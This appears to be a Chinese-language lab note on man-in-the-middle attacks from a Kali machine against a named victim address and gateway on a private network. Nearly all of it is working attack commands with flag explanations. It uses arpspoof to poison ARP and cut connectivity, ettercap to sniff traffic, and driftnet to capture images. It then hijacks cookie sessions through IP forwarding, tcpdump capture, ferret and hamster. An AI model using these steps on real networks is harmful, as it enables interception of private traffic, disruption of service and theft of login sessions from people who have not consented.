受害方:172.21.22.2
kali攻击方:172.21.230.72
断网攻击(中间人攻击)
受害者可上网
开始攻击
arpspoof -i eth0 -t 172.21.22.2 172.21.1.1
-i : 指定网卡
-t :指定攻击目标
最后是网关
查看arp缓存,已被投毒
arp -d 清除arp缓存
嗅探
开启中间人欺骗
ettercap -i eth0 -TqM arp:remote /172.21.22.2// /172.21.1.1//
-i 指定网卡
-M ARP欺骗
-T, –text #文本模式显示
-q, –quiet #安静模式,不显示嗅探数据
172.21.22.2 受害方
172.21.1.1 网关
捕获图片
driftnet -i eth0 -a -d ./picture
-i 指定网卡
-a :后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-d directory :指定保存图片的路径
./picture 保存到本地picture文件夹
cookie会话劫持
这次使用arpspoof来实现中间人攻击
使用前先开启流量转发,这里不解释,很基础的东西
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.21.22.2 172.21.1.1
-i : 指定网卡
-t :指定攻击目标
最后是网关
还是这种攻击,不够受害者的流量都经过攻击方转发转发出去了
抓取数据包
tcpdump -i eth0 -w ./cookie.pcap
ferret -r cookie.pcap
生成hamster.txt
保存到hamster同目录,或者直接设置环境变量
下载hamsterhttp://http.kali.org/pool/main/h/hamster-sidejack/
直接运行hamster
访问http://hamster或http://127.0.0.1:1234
成功劫持